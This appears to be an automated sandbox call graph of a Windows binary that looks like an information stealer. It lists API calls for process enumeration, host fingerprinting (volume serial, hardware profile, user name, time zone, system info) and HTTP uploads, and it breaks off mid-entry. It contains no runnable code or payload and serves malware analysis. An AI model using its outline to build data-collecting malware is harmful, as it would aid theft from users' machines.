73753->73754 73755 4047e8 3 API calls 73754->73755 73756 404511 73755->73756 73757 4047e8 3 API calls 73756->73757 73758 404528 73757->73758 73759 4047e8 3 API calls 73758->73759 73760 40453e 73759->73760 73761 4047e8 3 API calls 73760->73761 73762 404558 73761->73762 73763 4047e8 3 API calls 73762->73763 73764 40456f 73763->73764 73765 4047e8 3 API calls 73764->73765 73766 404586 73765->73766 73767 4047e8 3 API calls 73766->73767 73768 40459d 73767->73768 73769 4047e8 3 API calls 73768->73769 73770 4045b4 73769->73770 73771 4047e8 3 API calls 73770->73771 73772 4045cb 73771->73772 73773 4047e8 3 API calls 73772->73773 73774 4045e2 73773->73774 73775 4047e8 3 API calls 73774->73775 73776 4045f9 73775->73776 73777 4047e8 3 API calls 73776->73777 73778 404612 73777->73778 73779 4047e8 3 API calls 73778->73779 73780 404629 73779->73780 73781 4047e8 3 API calls 73780->73781 73782 404642 73781->73782 73783 4047e8 3 API calls 73782->73783 73784 404656 73783->73784 73785 4047e8 3 API calls 73784->73785 73786 40466d 73785->73786 73787 4047e8 3 API calls 73786->73787 73788 404684 73787->73788 73789 4047e8 3 API calls 73788->73789 73790 40469b 73789->73790 73791 4047e8 3 API calls 73790->73791 73792 4046b2 73791->73792 73793 4047e8 3 API calls 73792->73793 73794 4046cc 73793->73794 73795 4047e8 3 API calls 73794->73795 73796 4046e3 73795->73796 73797 4047e8 3 API calls 73796->73797 73798 4046f9 73797->73798 73799 4047e8 3 API calls 73798->73799 73800 404710 73799->73800 73801 4047e8 3 API calls 73800->73801 73802 404727 73801->73802 73803 4047e8 3 API calls 73802->73803 73804 40473d 73803->73804 73805 4047e8 3 API calls 73804->73805 73806 404754 73805->73806 73807 4047e8 3 API calls 73806->73807 73808 404768 73807->73808 73809 4047e8 3 API calls 73808->73809 73810 404781 73809->73810 73811 4047e8 3 API calls 73810->73811 73812 404797 73811->73812 73813 4047e8 3 API calls 73812->73813 73814 4047ae 73813->73814 73815 4047e8 3 API calls 73814->73815 73816 4047c5 73815->73816 73817 4047e8 3 API calls 73816->73817 73818 4047dc 73817->73818 73818->72826 75137 42f109 73819->75137 73821 41258e CreateToolhelp32Snapshot Process32First 73822 4125c2 Process32Next 73821->73822 73823 4125ef CloseHandle 73821->73823 73822->73823 73824 4125d4 StrCmpCA 73822->73824 75138 42f165 73823->75138 73824->73822 73826 4125e6 73824->73826 73826->73822 73829 4104e7 lstrcpyA 73828->73829 73830 411c67 73829->73830 73831 4104e7 lstrcpyA 73830->73831 73832 411c75 GetSystemTime 73831->73832 73833 411c91 73832->73833 73834 41d016 __setmbcp_nolock 5 API calls 73833->73834 73835 411cc8 73834->73835 73835->72833 73838 4105e1 73836->73838 73837 410605 73837->72848 73838->73837 73839 4105f3 lstrcpyA lstrcatA 73838->73839 73839->73837 73841 410519 lstrcpyA 73840->73841 73842 401d07 73841->73842 73843 410519 lstrcpyA 73842->73843 73844 401d12 73843->73844 73845 410519 lstrcpyA 73844->73845 73846 401d1d 73845->73846 73847 410519 lstrcpyA 73846->73847 73848 401d34 73847->73848 73849 4169b6 73848->73849 73850 410549 2 API calls 73849->73850 73851 4169ec 73850->73851 73852 410549 2 API calls 73851->73852 73853 4169f9 73852->73853 73854 410549 2 API calls 73853->73854 73855 416a06 73854->73855 73856 4104e7 lstrcpyA 73855->73856 73857 416a13 73856->73857 73858 4104e7 lstrcpyA 73857->73858 73859 416a20 73858->73859 73860 4104e7 lstrcpyA 73859->73860 73861 416a2d 73860->73861 73862 4104e7 lstrcpyA 73861->73862 73863 416a3a 73862->73863 73864 4104e7 lstrcpyA 73863->73864 73865 416a47 73864->73865 73866 4104e7 lstrcpyA 73865->73866 73922 416a54 73866->73922 73869 4168c6 33 API calls 73869->73922 73870 416a98 StrCmpCA 73871 416af1 StrCmpCA 73870->73871 73870->73922 73872 416cd4 73871->73872 73871->73922 73875 41058d lstrcpyA 73872->73875 73876 416cdf 73875->73876 73879 4104e7 lstrcpyA 73876->73879 73877 410519 lstrcpyA 73877->73922 73880 416cec 73879->73880 73882 41058d lstrcpyA 73880->73882 73881 401cfd lstrcpyA 73881->73922 73913 416c2c 73882->73913 73883 4104e7 lstrcpyA 73884 416d0b 73883->73884 73885 41058d lstrcpyA 73884->73885 73887 416d15 73885->73887 73886 416b51 StrCmpCA 73888 416baa StrCmpCA 73886->73888 73886->73922 75150 416da2 73887->75150 73890 416bc0 StrCmpCA 73888->73890 73891 416ca3 73888->73891 73893 416c72 73890->73893 73894 416bd6 StrCmpCA 73890->73894 73892 41058d lstrcpyA 73891->73892 73897 416cae 73892->73897 73895 41058d lstrcpyA 73893->73895 73898 416be8 StrCmpCA 73894->73898 73899 416c3e 73894->73899 73900 416c7d 73895->73900 73902 4104e7 lstrcpyA 73897->73902 73903 416c0a 73898->73903 73904 416bfa Sleep 73898->73904 73901 41058d lstrcpyA 73899->73901 73906 4104e7 lstrcpyA 73900->73906 73907 416c49 73901->73907 73908 416cbb 73902->73908 73905 41058d lstrcpyA 73903->73905 73904->73922 73910 416c15 73905->73910 73911 416c8a 73906->73911 73912 4104e7 lstrcpyA 73907->73912 73909 41058d lstrcpyA 73908->73909 73909->73913 73914 4104e7 lstrcpyA 73910->73914 73916 41058d lstrcpyA 73911->73916 73917 416c56 73912->73917 73913->73883 73918 416c22 73914->73918 73915 41683e 28 API calls 73915->73922 73916->73913 73919 41058d lstrcpyA 73917->73919 73920 41058d lstrcpyA 73918->73920 73919->73913 73920->73913 73921 41058d lstrcpyA 73921->73922 73922->73869 73922->73870 73922->73871 73922->73877 73922->73881 73922->73886 73922->73888 73922->73915 73922->73921 75141 4029f8 73922->75141 75144 402a09 73922->75144 75147 402a1a 73922->75147 75157 402a2b lstrcpyA 73922->75157 75158 402a3c lstrcpyA 73922->75158 75159 402a4d lstrcpyA 73922->75159 73923 416d28 73923->72859 73925 41058d lstrcpyA 73924->73925 73926 418257 73925->73926 73927 41058d lstrcpyA 73926->73927 73928 418262 73927->73928 73929 41058d lstrcpyA 73928->73929 73930 41826d 73929->73930 73930->72863 73932 410529 73931->73932 73933 41053e 73932->73933 73934 410536 lstrcpyA 73932->73934 73933->72876 73934->73933 73936 4109e6 GetVolumeInformationA 73935->73936 73937 4109df 73935->73937 73938 410a4d 73936->73938 73937->73936 73938->73938 73939 410a62 GetProcessHeap HeapAlloc 73938->73939 73940 410a7d 73939->73940 73941 410a8c wsprintfA lstrcatA 73939->73941 73942 4104e7 lstrcpyA 73940->73942 75160 411684 GetCurrentHwProfileA 73941->75160 73944 410a85 73942->73944 73947 41d016 __setmbcp_nolock 5 API calls 73944->73947 73945 410ac7 lstrlenA 75176 4123d5 lstrcpyA malloc strncpy 73945->75176 73949 410b2e 73947->73949 73948 410aea lstrcatA 73950 410b01 73948->73950 73949->72903 73951 4104e7 lstrcpyA 73950->73951 73952 410b18 73951->73952 73952->73944 73954 410519 lstrcpyA 73953->73954 73955 404b59 73954->73955 75180 404ab6 73955->75180 73957 404b65 73958 4104e7 lstrcpyA 73957->73958 73959 404b81 73958->73959 73960 4104e7 lstrcpyA 73959->73960 73961 404b91 73960->73961 73962 4104e7 lstrcpyA 73961->73962 73963 404ba1 73962->73963 73964 4104e7 lstrcpyA 73963->73964 73965 404bb1 73964->73965 73966 4104e7 lstrcpyA 73965->73966 73967 404bc1 InternetOpenA StrCmpCA 73966->73967 73968 404bf5 73967->73968 73969 405194 InternetCloseHandle 73968->73969 73970 411c4a 7 API calls 73968->73970 73980 4051e1 73969->73980 73971 404c15 73970->73971 73972 4105c7 2 API calls 73971->73972 73973 404c28 73972->73973 73974 41058d lstrcpyA 73973->73974 73975 404c33 73974->73975 73976 410609 3 API calls 73975->73976 73977 404c5f 73976->73977 73978 41058d lstrcpyA 73977->73978 73979 404c6a 73978->73979 73982 410609 3 API calls 73979->73982 73981 41d016 __setmbcp_nolock 5 API calls 73980->73981 73983 405235 73981->73983 73984 404c8b 73982->73984 74086 4139c2 StrCmpCA 73983->74086 73985 41058d lstrcpyA 73984->73985 73986 404c96 73985->73986 73987 4105c7 2 API calls 73986->73987 73988 404cb8 73987->73988 73989 41058d lstrcpyA 73988->73989 73990 404cc3 73989->73990 73991 410609 3 API calls 73990->73991 73992 404ce4 73991->73992 73993 41058d lstrcpyA 73992->73993 73994 404cef 73993->73994 73995 410609 3 API calls 73994->73995 73996 404d10 73995->73996 73997 41058d lstrcpyA 73996->73997 73998 404d1b 73997->73998 73999 410609 3 API calls 73998->73999 74000 404d3d 73999->74000 74001 4105c7 2 API calls 74000->74001 74002 404d48 74001->74002 74003 41058d lstrcpyA 74002->74003 74004 404d53 74003->74004 74005 404d69 InternetConnectA 74004->74005 74005->73969 74006 404d97 HttpOpenRequestA 74005->74006 74007 404dd7 74006->74007 74008 405188 InternetCloseHandle 74006->74008 74009 404dfb 74007->74009 74010 404ddf InternetSetOptionA 74007->74010 74008->73969 74011 410609 3 API calls 74009->74011 74010->74009 74012 404e11 74011->74012 74013 41058d lstrcpyA 74012->74013 74014 404e1c 74013->74014 74015 4105c7 2 API calls 74014->74015 74016 404e3e 74015->74016 74017 41058d lstrcpyA 74016->74017 74018 404e49 74017->74018 74019 410609 3 API calls 74018->74019 74020 404e6a 74019->74020 74021 41058d lstrcpyA 74020->74021 74022 404e75 74021->74022 74023 410609 3 API calls 74022->74023 74024 404e97 74023->74024 74025 41058d lstrcpyA 74024->74025 74026 404ea2 74025->74026 74027 410609 3 API calls 74026->74027 74028 404ec3 74027->74028 74029 41058d lstrcpyA 74028->74029 74030 404ece 74029->74030 74031 410609 3 API calls 74030->74031 74032 404eef 74031->74032 74033 41058d lstrcpyA 74032->74033 74034 404efa 74033->74034 74035 4105c7 2 API calls 74034->74035 74036 404f19 74035->74036 74037 41058d lstrcpyA 74036->74037 74038 404f24 74037->74038 74039 410609 3 API calls 74038->74039 74040 404f45 74039->74040 74041 41058d lstrcpyA 74040->74041 74042 404f50 74041->74042 74043 410609 3 API calls 74042->74043 74044 404f71 74043->74044 74045 41058d lstrcpyA 74044->74045 74046 404f7c 74045->74046 74047 4105c7 2 API calls 74046->74047 74048 404f9e 74047->74048 74049 41058d lstrcpyA 74048->74049 74050 404fa9 74049->74050 74051 410609 3 API calls 74050->74051 74052 404fca 74051->74052 74053 41058d lstrcpyA 74052->74053 74054 404fd5 74053->74054 74055 410609 3 API calls 74054->74055 74056 404ff7 74055->74056 74057 41058d lstrcpyA 74056->74057 74058 405002 74057->74058 74059 410609 3 API calls 74058->74059 74060 405023 74059->74060 74061 41058d lstrcpyA 74060->74061 74062 40502e 74061->74062 74063 410609 3 API calls 74062->74063 74064 40504f 74063->74064 74065 41058d lstrcpyA 74064->74065 74066 40505a 74065->74066 74067 4105c7 2 API calls 74066->74067 74068 405079 74067->74068 74069 41058d lstrcpyA 74068->74069 74070 405084 74069->74070 74071 4104e7 lstrcpyA 74070->74071 74072 40509f 74071->74072 74073 4105c7 2 API calls 74072->74073 74074 4050b6 74073->74074 74075 4105c7 2 API calls 74074->74075 74076 4050c7 74075->74076 74077 41058d lstrcpyA 74076->74077 74078 4050d2 74077->74078 74079 4050e8 lstrlenA lstrlenA HttpSendRequestA 74078->74079 74080 40515c InternetReadFile 74079->74080 74081 405176 InternetCloseHandle 74080->74081 74084 40511c 74080->74084 74082 402920 74081->74082 74082->74008 74083 410609 3 API calls 74083->74084 74084->74080 74084->74081 74084->74083 74085 41058d lstrcpyA 74084->74085 74085->74084 74087 4139e1 ExitProcess 74086->74087 74088 4139e8 strtok_s 74086->74088 74089 413b48 74088->74089 74101 413a04 74088->74101 74089->72911 74090 413b2a strtok_s 74090->74089 74090->74101 74091 413a21 StrCmpCA 74091->74090 74091->74101 74092 413a75 StrCmpCA 74092->74090 74092->74101 74093 413ab4 StrCmpCA 74093->74090 74093->74101 74094 413af4 StrCmpCA 74094->74090 74095 413b16 StrCmpCA 74095->74090 74096 413a59 StrCmpCA 74096->74090 74096->74101 74097 413ac9 StrCmpCA 74097->74090 74097->74101 74098 413a3d StrCmpCA 74098->74090 74098->74101 74099 413a9f StrCmpCA 74099->74090 74099->74101 74100 413ade StrCmpCA 74100->74090 74101->74090 74101->74091 74101->74092 74101->74093 74101->74094 74101->74095 74101->74096 74101->74097 74101->74098 74101->74099 74101->74100 74102 410549 2 API calls 74101->74102 74102->74101 74104 410519 lstrcpyA 74103->74104 74105 405f64 74104->74105 74106 404ab6 5 API calls 74105->74106 74107 405f70 74106->74107 74108 4104e7 lstrcpyA 74107->74108 74109 405f8c 74108->74109 74110 4104e7 lstrcpyA 74109->74110 74111 405f9c 74110->74111 74112 4104e7 lstrcpyA 74111->74112 74113 405fac 74112->74113 74114 4104e7 lstrcpyA 74113->74114 74115 405fbc 74114->74115 74116 4104e7 lstrcpyA 74115->74116 74117 405fcc InternetOpenA StrCmpCA 74116->74117 74118 406000 74117->74118 74119 4066ff InternetCloseHandle 74118->74119 74121 411c4a 7 API calls 74118->74121 75186 408048 CryptStringToBinaryA 74119->75186 74123 406020 74121->74123 74124 4105c7 2 API calls 74123->74124 74126 406033 74124->74126 74125 410549 2 API calls 74127 406739 74125->74127 74128 41058d lstrcpyA 74126->74128 74129 410609 3 API calls 74127->74129 74132 40603e 74128->74132 74130 406750 74129->74130 74131 41058d lstrcpyA 74130->74131 74137 40675b 74131->74137 74133 410609 3 API calls 74132->74133 74134 40606a 74133->74134 74135 41058d lstrcpyA 74134->74135 74136 406075 74135->74136 74139 410609 3 API calls 74136->74139 74138 41d016 __setmbcp_nolock 5 API calls 74137->74138 74140 4067eb 74138->74140 74141 406096 74139->74141 74270 41343f strtok_s 74140->74270 74142 41058d lstrcpyA 74141->74142 74143 4060a1 74142->74143 74144 4105c7 2 API calls 74143->74144 74145 4060c3 74144->74145 74146 41058d lstrcpyA 74145->74146 74147 4060ce 74146->74147 74148 410609 3 API calls 74147->74148 74149 4060ef 74148->74149 74150 41058d lstrcpyA 74149->74150 74151 4060fa 74150->74151 74152 410609 3 API calls 74151->74152 74153 40611b 74152->74153 74154 41058d lstrcpyA 74153->74154 74155 406126 74154->74155 74156 410609 3 API calls 74155->74156 74157 406148 74156->74157 74158 4105c7 2 API calls 74157->74158 74159 406153 74158->74159 74160 41058d lstrcpyA 74159->74160 74161 40615e 74160->74161 74162 406174 InternetConnectA 74161->74162 74162->74119 74163 4061a2 HttpOpenRequestA 74162->74163 74164 4061e2 74163->74164 74165 4066f3 InternetCloseHandle 74163->74165 74166 406206 74164->74166 74167 4061ea InternetSetOptionA 74164->74167 74165->74119 74168 410609 3 API calls 74166->74168 74167->74166 74169 40621c 74168->74169 74170 41058d lstrcpyA 74169->74170 74171 406227 74170->74171 74172 4105c7 2 API calls 74171->74172 74173 406249 74172->74173 74174 41058d lstrcpyA 74173->74174 74175 406254 74174->74175 74176 410609 3 API calls 74175->74176 74177 406275 74176->74177 74178 41058d lstrcpyA 74177->74178 74179 406280 74178->74179 74180 410609 3 API calls 74179->74180 74181 4062a2 74180->74181 74182 41058d lstrcpyA 74181->74182 74183 4062ad 74182->74183 74184 410609 3 API calls 74183->74184 74185 4062cf 74184->74185 74186 41058d lstrcpyA 74185->74186 74187 4062da 74186->74187 74188 410609 3 API calls 74187->74188 74189 4062fb 74188->74189 74190 41058d lstrcpyA 74189->74190 74191 406306 74190->74191 74192 4105c7 2 API calls 74191->74192 74193 406325 74192->74193 74194 41058d lstrcpyA 74193->74194 74195 406330 74194->74195 74196 410609 3 API calls 74195->74196 74197 406351 74196->74197 74198 41058d lstrcpyA 74197->74198 74199 40635c 74198->74199 74200 410609 3 API calls 74199->74200 74201 40637d 74200->74201 74202 41058d lstrcpyA 74201->74202 74203 406388 74202->74203 74204 4105c7 2 API calls 74203->74204 74205 4063aa 74204->74205 74206 41058d lstrcpyA 74205->74206 74207 4063b5 74206->74207 74208 410609 3 API calls 74207->74208 74209 4063d6 74208->74209 74210 41058d lstrcpyA 74209->74210 74211 4063e1 74210->74211 74212 410609 3 API calls 74211->74212 74213 406403 74212->74213 74214 41058d lstrcpyA 74213->74214 74215 40640e 74214->74215 74216 410609 3 API calls 74215->74216 74217 40642f 74216->74217 74218 41058d lstrcpyA 74217->74218 74219 40643a 74218->74219 74220 410609 3 API calls 74219->74220 74221 40645b 74220->74221 74222 41058d lstrcpyA 74221->74222 74223 406466 74222->74223 74224 410609 3 API calls 74223->74224 74225 406487 74224->74225 74226 41058d lstrcpyA 74225->74226 74227 406492 74226->74227 74228 410609 3 API calls 74227->74228 74229 4064b3 74228->74229 74230 41058d lstrcpyA 74229->74230 74231 4064be 74230->74231 74232 410609 3 API calls 74231->74232 74233 4064df 74232->74233 74234 41058d lstrcpyA 74233->74234 74235 4064ea 74234->74235 74236 4105c7 2 API calls 74235->74236 74237 406506 74236->74237 74238 41058d lstrcpyA 74237->74238 74239 406511 74238->74239 74240 410609 3 API calls 74239->74240 74241 406532 74240->74241 74242 41058d lstrcpyA 74241->74242 74243 40653d 74242->74243 74244 410609 3 API calls 74243->74244 74245 40655f 74244->74245 74246 41058d lstrcpyA 74245->74246 74247 40656a 74246->74247 74248 410609 3 API calls 74247->74248 74249 40658b 74248->74249 74250 41058d lstrcpyA 74249->74250 74251 406596 74250->74251 74252 410609 3 API calls 74251->74252 74253 4065b7 74252->74253 74254 41058d lstrcpyA 74253->74254 74255 4065c2 74254->74255 74256 4105c7 2 API calls 74255->74256 74257 4065e1 74256->74257 74258 41058d lstrcpyA 74257->74258 74259 4065ec 74258->74259 74260 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 74259->74260 75184 427050 74260->75184 74263 427050 _memmove 74264 406667 lstrlenA HttpSendRequestA 74263->74264 74265 4066d2 InternetReadFile 74264->74265 74266 4066ec InternetCloseHandle 74265->74266 74268 406692 74265->74268 74266->74165 74267 410609 3 API calls 74267->74268 74268->74265 74268->74266 74268->74267 74269 41058d lstrcpyA 74268->74269 74269->74268 74271 4134cc 74270->74271 74272 41346e 74270->74272 74271->72926 74273 4134b6 strtok_s 74272->74273 74274 410549 2 API calls 74272->74274 74275 410549 2 API calls 74272->74275 74273->74271 74273->74272 74274->74273 74275->74272 74279 413286 74276->74279 74277 413385 74277->72939 74278 413332 StrCmpCA 74278->74279 74279->74277 74279->74278 74280 410549 2 API calls 74279->74280 74281 413367 strtok_s 74279->74281 74282 413301 StrCmpCA 74279->74282 74283 4132dc StrCmpCA 74279->74283 74284 4132ab StrCmpCA 74279->74284 74280->74279 74281->74279 74282->74279 74283->74279 74284->74279 74286 413434 74285->74286 74287 4133bc 74285->74287 74286->72952 74288 410549 2 API calls 74287->74288 74289 4133e2 StrCmpCA 74287->74289 74290 41341a strtok_s 74287->74290 74291 410549 2 API calls 74287->74291 74288->74290 74289->74287 74290->74286 74290->74287 74291->74287 74293 4104e7 lstrcpyA 74292->74293 74294 413b9f 74293->74294 74295 410609 3 API calls 74294->74295 74296 413baf 74295->74296 74297 41058d lstrcpyA 74296->74297 74298 413bb7 74297->74298 74299 410609 3 API calls 74298->74299 74300 413bcf 74299->74300 74301 41058d lstrcpyA 74300->74301 74302 413bd7 74301->74302 74303 410609 3 API calls 74302->74303 74304 413bef 74303->74304 74305 41058d lstrcpyA 74304->74305 74306 413bf7 74305->74306 74307 410609 3 API calls 74306->74307 74308 413c0f 74307->74308 74309 41058d lstrcpyA 74308->74309 74310 413c17 74309->74310 74311 410609 3 API calls 74310->74311 74312 413c2f 74311->74312 74313 41058d lstrcpyA 74312->74313 74314 413c37 74313->74314 75191 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 74314->75191 74317 410609 3 API calls 74318 413c50 74317->74318 74319 41058d lstrcpyA 74318->74319 74320 413c58 74319->74320 74321 410609 3 API calls 74320->74321 74322 413c70 74321->74322 74323 41058d lstrcpyA 74322->74323 74324 413c78 74323->74324 74325 410609 3 API calls 74324->74325 74326 413c90 74325->74326 74327 41058d lstrcpyA 74326->74327 74328 413c98 74327->74328 75194 4115d4 74328->75194 74331 410609 3 API calls 74332 413cb1 74331->74332 74333 41058d lstrcpyA 74332->74333 74334 413cb9 74333->74334 74335 410609 3 API calls 74334->74335 74336 413cd1 74335->74336 74337 41058d lstrcpyA 74336->74337 74338 413cd9 74337->74338 74339 410609 3 API calls 74338->74339 74340 413cf1 74339->74340 74341 41058d lstrcpyA 74340->74341 74342 413cf9 74341->74342 74343 411684 11 API calls 74342->74343 74344 413d09 74343->74344 74345 4105c7 2 API calls 74344->74345 74346 413d16 74345->74346 74347 41058d lstrcpyA 74346->74347 74348 413d1e 74347->74348 74349 410609 3 API calls 74348->74349 74350 413d3e 74349->74350 74351 41058d lstrcpyA 74350->74351 74352 413d46 74351->74352 74353 410609 3 API calls 74352->74353 74354 413d5e 74353->74354 74355 41058d lstrcpyA 74354->74355 74356 413d66 74355->74356 74357 4109a2 19 API calls 74356->74357 74358 413d76 74357->74358 74359 4105c7 2 API calls 74358->74359 74360 413d83 74359->74360 74361 41058d lstrcpyA 74360->74361 74362 413d8b 74361->74362 74363 410609 3 API calls 74362->74363 74364 413dab 74363->74364 74365 41058d lstrcpyA 74364->74365 74366 413db3 74365->74366 74367 410609 3 API calls 74366->74367 74368 413dcb 74367->74368 74369 41058d lstrcpyA 74368->74369 74370 413dd3 74369->74370 74371 413ddb GetCurrentProcessId 74370->74371 75201 41224a OpenProcess 74371->75201 74374 4105c7 2 API calls 74375 413df8 74374->74375 74376 41058d lstrcpyA 74375->74376 74377 413e00 74376->74377 74378 410609 3 API calls 74377->74378 74379 413e20 74378->74379 74380 41058d lstrcpyA 74379->74380 74381 413e28 74380->74381 74382 410609 3 API calls 74381->74382 74383 413e40 74382->74383 74384 41058d lstrcpyA 74383->74384 74385 413e48 74384->74385 74386 410609 3 API calls 74385->74386 74387 413e60 74386->74387 74388 41058d lstrcpyA 74387->74388 74389 413e68 74388->74389 74390 410609 3 API calls 74389->74390 74391 413e80 74390->74391 74392 41058d lstrcpyA 74391->74392 74393 413e88 74392->74393 75208 410b30 GetProcessHeap HeapAlloc 74393->75208 74396 410609 3 API calls 74397 413ea1 74396->74397 74398 41058d lstrcpyA 74397->74398 74399 413ea9 74398->74399 74400 410609 3 API calls 74399->74400 74401 413ec1 74400->74401 74402 41058d lstrcpyA 74401->74402 74403 413ec9 74402->74403 74404 410609 3 API calls 74403->74404 74405 413ee1 74404->74405 74406 41058d lstrcpyA 74405->74406 74407 413ee9 74406->74407 75215 411807 74407->75215 74410 4105c7 2 API calls 74411 413f06 74410->74411 74412 41058d lstrcpyA 74411->74412 74413 413f0e 74412->74413 74414 410609 3 API calls 74413->74414 74415 413f2e 74414->74415 74416 41058d lstrcpyA 74415->74416 74417 413f36 74416->74417 74418 410609 3 API calls 74417->74418 74419 413f4e 74418->74419 74420 41058d lstrcpyA 74419->74420 74421 413f56 74420->74421 75232 411997 74421->75232 74423 413f67 74424 4105c7 2 API calls 74423->74424 74425 413f75 74424->74425 74426 41058d lstrcpyA 74425->74426 74427 413f7d 74426->74427 74428 410609 3 API calls 74427->74428 74429 413f9d 74428->74429 74430 41058d lstrcpyA 74429->74430 74431 413fa5 74430->74431 74432 410609 3 API calls 74431->74432 74433 413fbd 74432->74433 74434 41058d lstrcpyA 74433->74434 74435 413fc5 74434->74435 74436 410c85 3 API calls 74435->74436 74437 413fd2 74436->74437 74438 410609 3 API calls 74437->74438 74439 413fde 74438->74439 74440 41058d lstrcpyA 74439->74440 74441 413fe6 74440->74441 74442 410609 3 API calls 74441->74442 74443 413ffe 74442->74443 74444 41058d lstrcpyA 74443->74444 74445 414006 74444->74445 74446 410609 3 API calls 74445->74446 74447 41401e 74446->74447 74448 41058d lstrcpyA 74447->74448 74449 414026 74448->74449 75247 410c53 GetProcessHeap HeapAlloc GetUserNameA 74449->75247 74451 414033 74452 410609 3 API calls 74451->74452 74453 41403f 74452->74453 74454 41058d lstrcpyA 74453->74454 74455 414047 74454->74455 74456 410609 3 API calls 74455->74456 74457 41405f 74456->74457 74458 41058d lstrcpyA 74457->74458 74459 414067 74458->74459 74460 410609 3 API calls 74459->74460 74461 41407f 74460->74461 74462 41058d lstrcpyA 74461->74462 74463 414087 74462->74463 75248 411563 7 API calls 74463->75248 74466 4105c7 2 API calls 74467 4140a6 74466->74467 74468 41058d lstrcpyA 74467->74468 74469 4140ae 74468->74469 74470 410609 3 API calls 74469->74470 74471 4140ce 74470->74471 74472 41058d lstrcpyA 74471->74472 74473 4140d6 74472->74473 74474 410609 3 API calls 74473->74474 74475 4140ee 74474->74475 74476 41058d lstrcpyA 74475->74476 74477 4140f6 74476->74477 75251 410ddb 74477->75251 74480 4105c7 2 API calls 74481 414113 74480->74481 74482 41058d lstrcpyA 74481->74482 74483 41411b 74482->74483 74484 410609 3 API calls 74483->74484 74485 41413b 74484->74485 74486 41058d lstrcpyA 74485->74486 74487 414143 74486->74487 74488 410609 3 API calls 74487->74488 74489 41415b 74488->74489 74490 41058d lstrcpyA 74489->74490 74491 414163 74490->74491 74492 410cc0 9 API calls 74491->74492 74493 414170 74492->74493 74494 410609 3 API calls 74493->74494 74495 41417c 74494->74495 74496 41058d lstrcpyA 74495->74496 74497 414184 74496->74497 74498 410609 3 API calls 74497->74498 74499 41419c 74498->74499 74500 41058d lstrcpyA 74499->74500 74501 4141a4 74500->74501 74502 410609 3 API calls 74501->74502 74503 4141bc 74502->74503 74504 41058d lstrcpyA 74503->74504 74505 4141c4 74504->74505 75263 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 74505->75263 74508 410609 3 API calls 74509 4141dd 74508->74509 74510 41058d lstrcpyA 74509->74510 74511 4141e5 74510->74511 74512 410609 3 API calls 74511->74512 74513 4141fd 74512->74513 74514 41058d lstrcpyA 74513->74514 74515 414205 74514->74515 74516 410609 3 API calls 74515->74516 74517 41421d 74516->74517 74518 41058d lstrcpyA 74517->74518 74519 414225 74518->74519 74520 410609 3 API calls 74519->74520 74521 41423d 74520->74521 74522 41058d lstrcpyA 74521->74522 74523 414245 74522->74523 75268 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 74523->75268 74525 414252 74526 410609 3 API calls 74525->74526 74527 41425e 74526->74527 74528 41058d lstrcpyA 74527->74528 74529 414266 74528->74529 74530 410609 3 API calls 74529->74530 74531 41427e 74530->74531 74532 41058d lstrcpyA 74531->74532 74533 414286 74532->74533 74534 410609 3 API calls 74533->74534 74535 41429e 74534->74535 74536 41058d lstrcpyA 74535->74536 74537 4142a6 74536->74537 75271 411007 74537->75271 74540 410609 3 API calls 74541 4142bf 74540->74541 74542 41058d lstrcpyA 74541->74542 74543 4142c7 74542->74543 74544 410609 3 API calls 74543->74544 74545 4142df 74544->74545 74546 41058d lstrcpyA 74545->74546 74547 4142e7 74546->74547 74548 410609 3 API calls 74547->74548 74549 4142ff 74548->74549 74550 41058d lstrcpyA 74549->74550 74551 414307 74550->74551 75288 410fba GetSystemInfo wsprintfA 74551->75288 74554 410609 3 API calls 74555 414320 74554->74555 74556 41058d lstrcpyA 74555->74556 74557 414328 74556->74557 74558 410609 3 API calls 74557->74558 74559 414340 74558->74559 74560 41058d lstrcpyA 74559->74560 74561 414348 74560->74561 74562 410609 3 API calls 74561->74562 74563 414360 74562->74563 74564 41058d lstrcpyA 74563->74564 74565 414368 74564->74565 75291 411119 GetProcessHeap HeapAlloc 74565->75291 74568 410609 3 API calls 74569 414381 74568->74569 74570 41058d lstrcpyA 74569->74570 74571 414389 74570->74571 74572 410609 3 API calls 74571->74572 74573 4143a4 74572->74573 74574 41058d lstrcpyA 74573->74574 74575 4143ac 74574->74575 74576 410609 3 API calls 74575->74576 74577 4143c7 74576->74577 74578 41058d lstrcpyA 74577->74578 74579 4143cf 74578->74579 75298 411192 74579->75298 74582 4105c7 2 API calls 74583 4143ef 74582->74583 74584 41058d lstrcpyA 74583->74584 74585 4143f7 74584->74585 74586 410609 3 API calls 74585->74586 74587 41441a 74586->74587 74588 41058d lstrcpyA 74587->74588 74589 414422 74588->74589 74590 410609 3 API calls 74589->74590 74591 41443a 74590->74591 74592 41058d lstrcpyA 74591->74592 74593 414442 74592->74593 75306 4114a5 74593->75306 74596 4105c7 2 API calls 74597 414462 74596->74597 74598 41058d lstrcpyA 74597->74598 74599 41446a 74598->74599 74600 410609 3 API calls 74599->74600 74601 414490 74600->74601 74602 41058d lstrcpyA 74601->74602 74603 414498 74602->74603 74604 410609 3 API calls 74603->74604 74605 4144b3 74604->74605 74606 41058d lstrcpyA 74605->74606 74607 4144bb 74606->74607 75316 411203 74607->75316 74610 4105c7 2 API calls 74611 4144e0 74610->74611 74612 41058d lstrcpyA 74611->74612 74613 4144e8 74612->74613 74614 411203 21 API calls 74613->74614 74615 414509 74614->74615 74616 4105c7 2 API calls 74615->74616 74617 414518 74616->74617 74618 41058d lstrcpyA 74617->74618 74619 414520 74618->74619 74620 410609 3 API calls 74619->74620 74621 414543 74620->74621 74622 41058d lstrcpyA 74621->74622 74623 41454b 74622->74623 74624 401cfd lstrcpyA 74623->74624 74625 414560 lstrlenA 74624->74625 74626 4104e7 lstrcpyA 74625->74626 74627 41457d 74626->74627 75336 416e97 74627->75336 75137->73821 75139 41d016 __setmbcp_nolock 5 API calls 75138->75139 75140 412601 75139->75140 75140->73038 75140->73043 75142 4104e7 lstrcpyA 75141->75142 75143 402a05 75142->75143 75143->73922 75145 4104e7 lstrcpyA 75144->75145 75146 402a16 75145->75146 75146->73922 75148 4104e7 lstrcpyA 75147->75148 75149 402a27 75148->75149 75149->73922 75151 410519 lstrcpyA 75150->75151 75152 416dac 75151->75152 75153 410519 lstrcpyA 75152->75153 75154 416db7 75153->75154 75155 410519 lstrcpyA 75154->75155 75156 416dc2 75155->75156 75156->73923 75157->73922 75158->73922 75159->73922 75161 